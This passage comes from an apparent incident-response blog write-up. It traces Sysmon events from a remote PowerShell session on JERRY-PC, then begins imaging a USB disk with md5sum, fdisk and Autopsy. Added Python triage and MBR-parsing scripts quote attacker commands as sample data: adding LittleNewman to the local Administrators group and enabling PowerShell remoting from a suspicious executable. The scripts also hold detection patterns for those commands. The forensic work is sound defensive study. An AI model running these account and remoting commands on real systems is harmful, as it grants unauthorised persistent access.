</div><div><br /></div><div><div>In the interest of space and time, there is no need to show again that <i>cmd.exe</i> spawns <i>net.exe</i> and <i>net.exe</i> spawns <i>net1.exe</i>. We should be aware of this flow by now, based on all the analysis done so far. However, if you are still interested, see the map above.</div><div><br /></div><div>We then see "<i>Ssms.exe</i>", the executable of "<i>Microsoft SQL Server Management Studio 19</i>", being launched from <i>explorer.exe</i> by <i>Jerry</i>.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">- EventData </span>
<span style="color: white;"> RuleName - </span>
<span style="color: white;"> UtcTime 2023-07-23 23:11:44.681 </span>
<span style="color: white;"> ProcessGuid {3f0f5ad4-b3b0-64bd-b700-000000003100} </span>
<span style="color: #fcff01;"><b><span> ProcessId 6796 </span>
<span> Image C:\Program Files (x86)\Microsoft SQL Server Management Studio 19\Common7\IDE\Ssms.exe </span>
<span> FileVersion 19.1.56.0</span></b></span><span style="color: white;"> </span>
<span style="color: white;"> Description SSMS 19 </span>
<span style="color: white;"> Product Microsoft SQL Server </span>
<span style="color: white;"> Company Microsoft Corporation </span>
<span style="color: white;"> OriginalFileName SSMS.EXE </span>
<span style="color: white;"> CommandLine "C:\Program Files (x86)\Microsoft SQL Server Management Studio 19\Common7\IDE\Ssms.exe" </span>
<span style="color: white;"> CurrentDirectory C:\Windows\system32\ </span>
<span style="color: white;"> User JERRY-PC\Jerry </span>
<span style="color: white;"> LogonGuid {3f0f5ad4-b317-64bd-795a-050000000000} </span>
<span style="color: white;"> LogonId 0x55a79 </span>
<span style="color: white;"> TerminalSessionId 1 </span>
<span style="color: white;"> IntegrityLevel Medium </span>
<span style="color: white;"> Hashes MD5=EFA9FE326FD87239CD55FC6CFA2FB031,SHA256=F838835F72F3E05768530BE21E279901715B0DB2B726813658DB804FF368D58B,IMPHASH=B28D945C37B74021F14171C4E229AB7D </span>
<span style="color: white;"> ParentProcessGuid {3f0f5ad4-b318-64bd-4500-000000003100} </span>
<span style="color: white;"> ParentProcessId 3440 </span>
<span style="color: white;"> ParentImage C:\Windows\explorer.exe </span>
<span style="color: white;"> ParentCommandLine C:\Windows\Explorer.EXE </span>
<span style="color: white;"> ParentUser JERRY-PC\Jerry </span>
</pre></div>
</div><div><br /></div><div>Looks like when the tool was used, it resolved the name <i>MSSQL-SR</i> to <i>10.240.240.6</i>, i.e. it found an SQL Server there. Remember, during the nmap scan, Newman did find port <i>1433</i> open on <i>10.240.240.6</i>. This port is typically associated with MSSQL.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">- EventData </span>
<span style="color: white;"> RuleName - </span>
<span style="color: white;"> UtcTime 2023-07-23 23:12:27.268 </span>
<span style="color: white;"> ProcessGuid {3f0f5ad4-b3b0-64bd-b700-000000003100} </span>
<span style="color: white;"> ProcessId 6796 </span>
<span style="color: white;"> QueryName MSSQL-SR </span>
<span style="color: white;"> QueryStatus 0 </span>
<b><span style="color: #fcff01;"><span> QueryResults 10.240.240.6; </span>
<span> Image C:\Program Files (x86)\Microsoft SQL Server Management Studio 19\Common7\IDE\Ssms.exe </span>
</span></b><span style="color: white;"> User JERRY-PC\Jerry </span>
</pre></div>
</div><div><br /></div><div><div>We now see the WinRM host process, <i>wsmprovhost.exe</i>, starting up under <i>svchost.exe -k DcomLaunch</i>. Interestingly, the user authenticating this time is <i>LittleNewman</i> against <i>JERRY-PC</i>.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">- EventData </span>
<span style="color: white;"> RuleName - </span>
<span style="color: white;"> UtcTime 2023-07-23 23:13:10.952 </span>
<span style="color: white;"> ProcessGuid {3f0f5ad4-b406-64bd-c100-000000003100} </span>
<span style="color: white;"> </span><span style="color: #fcff01;"><b><span> ProcessId 4000 </span>
<span> Image C:\Windows\System32\wsmprovhost.exe</span></b></span><span style="color: white;"> </span>
<span style="color: white;"> FileVersion 10.0.22621.1485 (WinBuild.160101.0800) </span>
<span style="color: white;"> Description Host process for WinRM plug-ins </span>
<span style="color: white;"> Product Microsoft® Windows® Operating System </span>
<span style="color: white;"> Company Microsoft Corporation </span>
<span style="color: white;"> OriginalFileName wsmprovhost.exe </span>
<span style="color: white;"> CommandLine C:\Windows\system32\wsmprovhost.exe -Embedding </span>
<span style="color: white;"> CurrentDirectory C:\Windows\system32\ </span>
<span style="color: white;"> User JERRY-PC\LittleNewman </span>
<span style="color: white;"> LogonGuid {3f0f5ad4-b406-64bd-62c6-1b0000000000} </span>
<span style="color: white;"> LogonId 0x1bc662 </span>
<span style="color: white;"> TerminalSessionId 0 </span>
<span style="color: white;"> IntegrityLevel High </span>
<span style="color: white;"> Hashes MD5=36DFD6343147B4172539CB023EF56485,SHA256=30C91BE613CB8BF4A882DEB2D3B77C8ABC0C41617178BA3681CFA746DFCED273,IMPHASH=35C50CC7209A454799C998CDE17C6E24 </span>
<span style="color: white;"> ParentProcessGuid {3f0f5ad4-b311-64bd-0d00-000000003100} </span>
<span style="color: white;"> ParentProcessId 876 </span>
<span style="color: white;"> ParentImage C:\Windows\System32\svchost.exe </span>
<span style="color: white;"> ParentCommandLine C:\Windows\system32\svchost.exe -k DcomLaunch -p </span>
<span style="color: white;"> ParentUser NT AUTHORITY\SYSTEM </span>
</pre></div>
</div><div><br /></div><div><div>We also see a PowerShell script being executed (this is the file-creation event for it, logged against <i>wsmprovhost.exe</i>), and the target filename includes <i>LittleNewman</i>.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">- EventData </span>
<span style="color: white;"> RuleName - </span>
<span style="color: white;"> UtcTime 2023-07-23 23:13:11.047 </span>
<span style="color: white;"> ProcessGuid {3f0f5ad4-b406-64bd-c100-000000003100} </span>
<span style="color: white;"> ProcessId 4000 </span>
<span style="color: white;"> Image C:\Windows\system32\wsmprovhost.exe </span>
<b><span style="color: #fcff01;"><span> TargetFilename C:\Users\LittleNewman.JERRY-PC\AppData\Local\Temp\__PSScriptPolicyTest_21oycspq.d2l.ps1 </span>
</span></b><span style="color: white;"> CreationUtcTime 2023-07-23 23:13:11.047 </span>
<span style="color: white;"> User JERRY-PC\LittleNewman </span>
</pre></div>
</div><div><br /></div><div>We are now beginning to see some of the evidence we saw earlier via the packet analysis. Below we see the "<i>whoami</i>" command was run. Notice all of this is being done using the <i>LittleNewman </i>account.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">- EventData </span>
<span style="color: white;"> RuleName - </span>
<span style="color: white;"> UtcTime 2023-07-23 23:13:16.542 </span>
<span style="color: white;"> ProcessGuid {3f0f5ad4-b40c-64bd-c300-000000003100} </span>
<span style="color: #fcff01;"><b><span> ProcessId 1852 </span>
<span> Image C:\Windows\System32\whoami.exe </span></b></span>
<span style="color: white;"> FileVersion 10.0.22621.1 (WinBuild.160101.0800) </span>
<span style="color: white;"> Description whoami - displays logged on user information </span>
<span style="color: white;"> Product Microsoft® Windows® Operating System </span>
<span style="color: white;"> Company Microsoft Corporation </span>
<span style="color: white;"> OriginalFileName whoami.exe </span>
<span style="color: white;"> CommandLine "C:\Windows\system32\whoami.exe" </span>
<span style="color: white;"> CurrentDirectory C:\Users\LittleNewman.JERRY-PC\Documents\ </span>
<span style="color: white;"> User JERRY-PC\LittleNewman </span>
<span style="color: white;"> LogonGuid {3f0f5ad4-b406-64bd-62c6-1b0000000000} </span>
<span style="color: white;"> LogonId 0x1bc662 </span>
<span style="color: white;"> TerminalSessionId 0 </span>
<span style="color: white;"> IntegrityLevel High </span>
<span style="color: white;"> Hashes MD5=E0F37DB23E4F3163159A815610DF8CF2,SHA256=574BC2A2995FE2B1F732CCD39F2D99460ACE980AF29EFDF1EB0D3E888BE7D6F0,IMPHASH=62935820E434AF643547B7F5F5BD0292 </span>
<span style="color: white;"> ParentProcessGuid {3f0f5ad4-b406-64bd-c100-000000003100} </span>
<span style="color: white;"> ParentProcessId 4000 </span>
<span style="color: #fcff01;"><b><span> ParentImage C:\Windows\System32\wsmprovhost.exe </span>
</b></span><span style="color: white;"> ParentCommandLine C:\Windows\system32\wsmprovhost.exe -Embedding </span>
<span style="color: white;"> ParentUser JERRY-PC\LittleNewman </span>
</pre></div>
</div><div><br /></div><div><div>Next, an attempt to validate the hostname with <i>hostname.exe</i>. Once again, all of this is being done via PS Remoting, as the parent <i>wsmprovhost.exe</i> shows.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">- EventData </span>
<span style="color: white;"> RuleName - </span>
<span style="color: white;"> UtcTime 2023-07-23 23:13:19.898 </span>
<span style="color: white;"> ProcessGuid {3f0f5ad4-b40f-64bd-c500-000000003100} </span>
<span style="color: #fcff01;"><b><span> ProcessId 8172 </span>
</b></span><b><span style="color: #fcff01;"><span> Image C:\Windows\System32\HOSTNAME.EXE </span>
</span></b><span style="color: white;"> FileVersion 10.0.22621.1 (WinBuild.160101.0800) </span>
<span style="color: white;"> Description Hostname APP </span>
<span style="color: white;"> Product Microsoft® Windows® Operating System </span>
<span style="color: white;"> Company Microsoft Corporation </span>
<span style="color: white;"> OriginalFileName hostname.exe </span>
<span style="color: white;"> CommandLine "C:\Windows\system32\HOSTNAME.EXE" </span>
<span style="color: white;"> CurrentDirectory C:\Users\LittleNewman.JERRY-PC\Documents\ </span>
<span style="color: white;"> User JERRY-PC\LittleNewman </span>
<span style="color: white;"> LogonGuid {3f0f5ad4-b406-64bd-62c6-1b0000000000} </span>
<span style="color: white;"> LogonId 0x1bc662 </span>
<span style="color: white;"> TerminalSessionId 0 </span>
<span style="color: white;"> IntegrityLevel High </span>
<span style="color: white;"> Hashes MD5=26867C731CF949313F118FA0911789CB,SHA256=193D56937965C2EECC6556619CAC6B6CE7ADB1827D12830BFED1A7B038288613,IMPHASH=8CB84C534505B1E47EF25FA2CD9A16BB </span>
<span style="color: white;"> ParentProcessGuid {3f0f5ad4-b406-64bd-c100-000000003100} </span>
<span style="color: white;"> ParentProcessId 4000 </span>
<b><span style="color: #fcff01;"><span> ParentImage C:\Windows\System32\wsmprovhost.exe </span>
</span></b><span style="color: white;"> ParentCommandLine C:\Windows\system32\wsmprovhost.exe -Embedding </span>
<span style="color: white;"> ParentUser JERRY-PC\LittleNewman </span>
</pre></div>
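<div><br /></div><div>Reading these Sysmon records by hand works for a handful of events, but the same findings can be pulled out of a whole export. The script below is an added example written for this post, not part of the original write-up or of any tool used in it: it parses the "- EventData / Key Value" dumps quoted above, flags <i>Enable-PSRemoting</i>, additions to the local <i>Administrators</i> and <i>Remote Management Users</i> groups via <i>net</i>/<i>net1</i>, and discovery commands whose parent is <i>wsmprovhost.exe</i>, i.e. commands run inside a remote PowerShell session. The sample records are constructed to mirror the events shown on this page; the first record's ProcessId (6100) and ParentImage are placeholders the page does not show, and the discovery-tool list generalises beyond the two commands (<i>whoami</i>, <i>hostname</i>) seen here.</div><div><br /></div>

```python
"""Triage Sysmon process-creation dumps. Added example, not part of the write-up."""
import re

# Constructed sample input in the "- EventData / Key Value" layout quoted on
# the page. Values come from the events shown above where they exist; the
# first record's ProcessId (6100) and ParentImage are placeholders.
SAMPLE_EVENTS = r"""
- EventData
 ProcessId 6100
 Image C:\Windows\System32\cmd.exe
 CommandLine C:\Windows\system32\cmd.exe /c "powershell.exe Enable-PSRemoting -Force"
 User JERRY-PC\Jerry
 ParentImage E:\Win11updates.exe
- EventData
 ProcessId 8144
 Image C:\Windows\System32\net.exe
 CommandLine net localgroup Administrators LittleNewman /add
 User JERRY-PC\Jerry
 ParentImage C:\Windows\System32\cmd.exe
- EventData
 ProcessId 2480
 Image C:\Windows\System32\net1.exe
 CommandLine C:\Windows\system32\net1 localgroup Administrators LittleNewman /add
 User JERRY-PC\Jerry
 ParentImage C:\Windows\System32\net.exe
- EventData
 ProcessId 2500
 Image C:\Windows\System32\cmd.exe
 CommandLine C:\Windows\system32\cmd.exe /c "net localgroup "Remote Management Users" LittleNewman /add"
 User JERRY-PC\Jerry
 ParentImage E:\Win11updates.exe
- EventData
 ProcessId 1852
 Image C:\Windows\System32\whoami.exe
 CommandLine "C:\Windows\system32\whoami.exe"
 User JERRY-PC\LittleNewman
 ParentImage C:\Windows\System32\wsmprovhost.exe
- EventData
 ProcessId 8172
 Image C:\Windows\System32\HOSTNAME.EXE
 CommandLine "C:\Windows\system32\HOSTNAME.EXE"
 User JERRY-PC\LittleNewman
 ParentImage C:\Windows\System32\wsmprovhost.exe
"""

SENSITIVE_GROUPS = {"administrators", "remote management users"}
# Matches `localgroup Administrators X /add` and the quoted form
# `localgroup "Remote Management Users" X /add`.
GROUP_ADD = re.compile(
    r'localgroup\s+("?)(?P<group>[^"]+?)\1\s+(?P<member>\S+)\s+/add', re.I)
# whoami and hostname are the two seen on the page; the rest generalise.
DISCOVERY_TOOLS = {"whoami.exe", "hostname.exe", "ipconfig.exe",
                   "systeminfo.exe", "net.exe"}


def parse_events(text):
    """Split a dump into one dict per '- EventData' record."""
    events, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "- EventData":
            current = {}
            events.append(current)
        elif current is not None and line:
            key, _, value = line.partition(" ")
            current[key] = value
    return events


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def triage(events):
    """Return (finding, ProcessId, User, detail) tuples in event order."""
    findings, seen_adds = [], set()
    for e in events:
        pid, user = e.get("ProcessId", "?"), e.get("User", "")
        cmd = e.get("CommandLine", "")
        image, parent = basename(e.get("Image", "")), basename(e.get("ParentImage", ""))
        if "enable-psremoting" in cmd.lower():
            findings.append(("psremoting_enabled", pid, user, cmd))
        m = GROUP_ADD.search(cmd)
        if m and m.group("group").lower() in SENSITIVE_GROUPS:
            # cmd.exe -> net.exe -> net1.exe all carry the same command line:
            # report each membership change once, at its first sighting.
            key = (m.group("group").lower(), m.group("member").lower())
            if key not in seen_adds:
                seen_adds.add(key)
                findings.append(("sensitive_group_add", pid, user,
                                 f"{m.group('member')} -> {m.group('group')}"))
        if parent == "wsmprovhost.exe" and image in DISCOVERY_TOOLS:
            findings.append(("remote_session_discovery", pid, user, image))
    return findings


if __name__ == "__main__":
    for kind, pid, user, detail in triage(parse_events(SAMPLE_EVENTS)):
        print(f"{kind:26} pid={pid:<5} user={user:22} {detail}")
```

<div>Run against the constructed records it reports one <i>psremoting_enabled</i>, two <i>sensitive_group_add</i> findings (the net1 repeat of the Administrators change is collapsed into the net.exe sighting) and two <i>remote_session_discovery</i> findings under the <i>LittleNewman</i> account, which is the same chain the events above were read out by hand. On a real export, feed the script the exported EventData text instead of <i>SAMPLE_EVENTS</i>.</div>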
</div><div><br /></div><div><div><span style="font-size: large;"><b><br /></b></span></div><div><span style="font-size: large;"><b>Transitioning to the USB Disk Analysis</b></span></div></div><div><br /></div><div><div>Get the MD5 hash of the USB image provided.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ md5sum usbstick.vhd </span>
<span style="color: white;">1ecc5c7b011770d185b714f6c6d7de0a usbstick.vhd</span>
</pre></div>
</div><div><br /></div><div><div>Make a copy of the USB image.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ cp usbstick.vhd usbstick.vhd.ORIGINAL</span>
</pre></div>
</div><div><br /></div><div><div>Confirm that the MD5 sums of the two files are the same.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ md5sum *</span>
<span style="color: white;">1ecc5c7b011770d185b714f6c6d7de0a usbstick.vhd</span>
<span style="color: white;">1ecc5c7b011770d185b714f6c6d7de0a usbstick.vhd.ORIGINAL</span>
</pre></div>
</div><div><br /></div><div><div>Get some information on the disk using the Linux file command.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ file usbstick.vhd | fmt</span>
<span style="color: white;">usbstick.vhd: DOS/MBR boot sector MS-MBR Windows 7 english at offset 0x163</span>
<span style="color: white;">"Invalid partition table" at offset 0x17b "Error loading operating system"</span>
<span style="color: white;">at offset 0x19a "Missing operating system", disk signature 0xcac87e69;</span>
<span style="color: white;">partition 1 : ID=0x7, start-CHS (0x0,2,3), end-CHS (0x5,254,57),</span>
<span style="color: white;">startsector 128, 96256 sectors</span>
</pre></div>
</div><div><br /></div><div><div>Using <i>exiftool </i>to take a different look.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ exiftool ../usbstick.vhd </span>
<span style="color: white;">ExifTool Version Number : 12.63</span>
<span style="color: white;">File Name : usbstick.vhd</span>
<span style="color: white;">Directory : ..</span>
<span style="color: white;">File Size : 52 MB</span>
<span style="color: white;">File Modification Date/Time : 2023:07:23 19:28:58-04:00</span>
<span style="color: white;">File Access Date/Time : 2023:07:28 09:32:04-04:00</span>
<span style="color: white;">File Inode Change Date/Time : 2023:07:25 14:45:15-04:00</span>
<span style="color: white;">File Permissions : -rw-r--r--</span>
<span style="color: white;">Error : Unknown file type</span>
</pre></div>
</div><div><br /></div><div><div>Yet another perspective, this time with <i>fdisk</i>.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ fdisk --list usbstick.vhd</span>
<span style="color: white;">Disk usbstick.vhd: 50 MiB, 52429312 bytes, 102401 sectors</span>
<span style="color: white;">Units: sectors of 1 * 512 = 512 bytes</span>
<span style="color: white;">Sector size (logical/physical): 512 bytes / 512 bytes</span>
<span style="color: white;">I/O size (minimum/optimal): 512 bytes / 512 bytes</span>
<span style="color: white;">Disklabel type: dos</span>
<span style="color: white;">Disk identifier: 0xcac87e69</span>
<span style="color: white;">Device Boot Start End Sectors Size Id Type</span>
<span style="color: white;">usbstick.vhd1 128 96383 96256 47M 7 HPFS/NTFS/exFAT</span>
</pre></div>
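<div><br /></div><div>Both <i>file</i> and <i>fdisk</i> read those numbers from the 64-byte partition table at the end of sector 0: a 4-byte disk signature at offset 0x1B8 (what fdisk prints as "Disk identifier"), four 16-byte partition entries starting at 0x1BE, and the 0x55AA boot marker in the last two bytes. The parser below is an added example written for this post, not part of the write-up or of either tool: it decodes each entry into its type, CHS and LBA ranges, and the byte offset at which the volume starts. The sample sector it builds is constructed to carry the values reported above for <i>usbstick.vhd</i>; <i>parse_image()</i> reads the first sector of a real image file instead. A fixed-size VHD is a raw image followed by a 512-byte footer, which is why both tools treat it like a plain disk.</div><div><br /></div>

```python
"""Parse the MBR partition table of a raw disk image.

Added example, not part of the original write-up. The sample sector is
constructed to match the `file` and `fdisk` output for usbstick.vhd
(disk signature 0xcac87e69, one NTFS partition: start sector 128, 96256 sectors).
"""
import struct
import sys

SECTOR = 512
DISK_ID_OFFSET = 0x1B8      # 4-byte disk signature, fdisk's "Disk identifier"
PART_TABLE_OFFSET = 0x1BE   # four 16-byte partition entries
PART_TYPES = {0x05: "Extended", 0x07: "HPFS/NTFS/exFAT", 0x0B: "W95 FAT32",
              0x0C: "W95 FAT32 (LBA)", 0x83: "Linux"}


def encode_chs(cyl, head, sector):
    """Pack a (cylinder, head, sector) triple into the 3-byte MBR form."""
    return bytes([head & 0xFF, (sector & 0x3F) | ((cyl >> 2) & 0xC0), cyl & 0xFF])


def decode_chs(raw):
    head, sector = raw[0], raw[1] & 0x3F
    cyl = ((raw[1] & 0xC0) << 2) | raw[2]
    return cyl, head, sector


def build_sample_mbr():
    """Constructed sector 0 with the same partition layout as usbstick.vhd."""
    sec = bytearray(SECTOR)
    struct.pack_into("<I", sec, DISK_ID_OFFSET, 0xCAC87E69)
    entry = (bytes([0x00]) + encode_chs(0, 2, 3) + bytes([0x07])
             + encode_chs(5, 254, 57) + struct.pack("<II", 128, 96256))
    sec[PART_TABLE_OFFSET:PART_TABLE_OFFSET + 16] = entry
    sec[510:512] = b"\x55\xAA"
    return bytes(sec)


def parse_mbr(sector):
    """Return the disk signature and the non-empty partition entries."""
    if len(sector) < SECTOR or sector[510:512] != b"\x55\xAA":
        raise ValueError("missing 0x55AA boot signature: not an MBR")
    disk_id = struct.unpack_from("<I", sector, DISK_ID_OFFSET)[0]
    parts = []
    for i in range(4):
        # status, CHS start, type, CHS end, LBA start, sector count
        status, chs_s, ptype, chs_e, lba, count = struct.unpack_from(
            "<B3sB3sII", sector, PART_TABLE_OFFSET + 16 * i)
        if ptype == 0:
            continue  # empty slot
        parts.append({
            "index": i + 1,
            "bootable": status == 0x80,
            "type": ptype,
            "type_name": PART_TYPES.get(ptype, "unknown"),
            "start_chs": decode_chs(chs_s),
            "end_chs": decode_chs(chs_e),
            "start_sector": lba,
            "sectors": count,
            "end_sector": lba + count - 1,
            "byte_offset": lba * SECTOR,   # for mount -o loop,offset=...
            "size_bytes": count * SECTOR,
        })
    return {"disk_id": disk_id, "partitions": parts}


def parse_image(path):
    """Read sector 0 of an image file (raw dd image or fixed-size VHD)."""
    with open(path, "rb") as fh:
        return parse_mbr(fh.read(SECTOR))


if __name__ == "__main__":
    info = parse_image(sys.argv[1]) if len(sys.argv) > 1 else parse_mbr(build_sample_mbr())
    print(f"Disk identifier: 0x{info['disk_id']:08x}")
    for p in info["partitions"]:
        print(f"  part {p['index']}: {p['type_name']} start={p['start_sector']} "
              f"sectors={p['sectors']} offset={p['byte_offset']} bytes "
              f"size={p['size_bytes'] // 2**20}M")
```

<div>For the partition above the byte offset comes out as 128 * 512 = 65536, which is what <i>mount -o ro,loop,offset=65536</i> or The Sleuth Kit's sector offset (<i>-o 128</i>) need to reach the NTFS volume, and 96256 sectors is exactly the 47M that fdisk prints. Reading only sector 0 keeps the script harmless to the evidence file; it never writes to the image.</div>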
</div><div><div>Working on the <i>usbstick.vhd</i> file with Autopsy 4.20.0.</div><div><br /></div><div>Created a new case in Autopsy 4.20.0.</div><div><br /></div><div>Added a data source.</div><div><br /></div><div>At first glance, we see the disk has 3 volumes, of which 2 are unallocated:<br /><br /></div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgto8NniAVoyam0kl-O8H2r48KVCF1wC-dLFOSJb0jgKducyOFO1kVglXDmoImV4yQ8J_VnIWGIEutW8elkjIfNYlFw7vtRNWoU95ADqX6PkAmdnz64ZjmF0j6uuJonCopsA-S-CdcNDG46EyGY8SEXyOSNGPjOKe78WluwUJjBSrjRBjTop4h_wYBcY7g/s1112/volumes.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="264" data-original-width="1112" height="152" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgto8NniAVoyam0kl-O8H2r48KVCF1wC-dLFOSJb0jgKducyOFO1kVglXDmoImV4yQ8J_VnIWGIEutW8elkjIfNYlFw7vtRNWoU95ADqX6PkAmdnz64ZjmF0j6uuJonCopsA-S-CdcNDG46EyGY8SEXyOSNGPjOKe78WluwUJjBSrjRBjTop4h_wYBcY7g/w640-h152/volumes.png" width="640" /></a></div><br /></div><div><br /></div><div><br />Expanding volume 2 ...<br /><br /></div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgAUh1ByrZZHdD76rRjjpo937ncNy-MAt6M8DRmO-I0boagOKKFvVWGFJUCdI1mvm3R-y088Jrm7xlkQvIhszNDqreNa2um4roHgF4gSCkA6lx3EoKBX4tRYSA0G71o3551hNfSbIIvQsW04RLjyaTtDLoSVjYJWGzyHorFF1cv85seLEfwTA_Zmb9Zb8/s319/Volume2-expanded.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="319" data-original-width="301" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgAUh1ByrZZHdD76rRjjpo937ncNy-MAt6M8DRmO-I0boagOKKFvVWGFJUCdI1mvm3R-y088Jrm7xlkQvIhszNDqreNa2um4roHgF4gSCkA6lx3EoKBX4tRYSA0G71o3551hNfSbIIvQsW04RLjyaTtDLoSVjYJWGzyHorFF1cv85seLEfwTA_Zmb9Zb8/w604-h640/Volume2-expanded.PNG" width="604" /></a></div><br /></div><div><br /></div><div>Looking at the files found, we see 2 images and 3 plain text files being reported.</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiosKlEgULuDCQm8-_d7sq9eZrsBg7mF8d4jPX_7M_9kGMcU3_pbreFpVmkej-zij1EEeFnpKG1G_-woHe6DPuVR4cIObDaBqkqS-Zgd9HOYcjaZERd4k_D1GkcmwvIaMpgwQEyHdNovdZu9WdTqRROQHzXu2LqNHFDb2IW9YqGEW9w5iWAKbwYHJJ384/s365/Files%20with%20.txt%20extension.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="365" data-original-width="220" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiosKlEgULuDCQm8-_d7sq9eZrsBg7mF8d4jPX_7M_9kGMcU3_pbreFpVmkej-zij1EEeFnpKG1G_-woHe6DPuVR4cIObDaBqkqS-Zgd9HOYcjaZERd4k_D1GkcmwvIaMpgwQEyHdNovdZu9WdTqRROQHzXu2LqNHFDb2IW9YqGEW9w5iWAKbwYHJJ384/s16000/Files%20with%20.txt%20extension.PNG" /></a></div><br /><div><br /></div><div>Looking at the <i>$RECYCLE.BIN</i> folder, we see a SID: <i>S-1-5-21-2404277346-2099594652-1884649452-1010</i>.</div><div><br /></div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjA__JUM240ZAgsoqzIGe_DFT05cEcwVmaxcWqf_8Y3fXecgv666otrqln1TBZ3Of3lFTfVY7up7eLtkLILSyTAV3KAUC3rVrVdIXoIp-cl15yA1nzeB8hBf2jGnOCze8jiKaAMlRrQlIoX0Cun0-3NbMxCgIKuQaAg2KNj_5ngZQuqkTaCKBWvXcn3RQo/s746/recycle-bin-SID.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="333" data-original-width="746" height="286" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjA__JUM240ZAgsoqzIGe_DFT05cEcwVmaxcWqf_8Y3fXecgv666otrqln1TBZ3Of3lFTfVY7up7eLtkLILSyTAV3KAUC3rVrVdIXoIp-cl15yA1nzeB8hBf2jGnOCze8jiKaAMlRrQlIoX0Cun0-3NbMxCgIKuQaAg2KNj_5ngZQuqkTaCKBWvXcn3RQo/w640-h286/recycle-bin-SID.PNG" width="640" /></a></div><br /><br /></div><div>Looking at the log files, we see this SID is associated with the host at <i>10.240.240.5</i>, which is associated with <i>Newman's</i> computer and account.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ cat 10-240-240-5-events.csv | grep "S-1-5-21-2404277346-2099594652-1884649452-1010" | head --lines=5 </span>
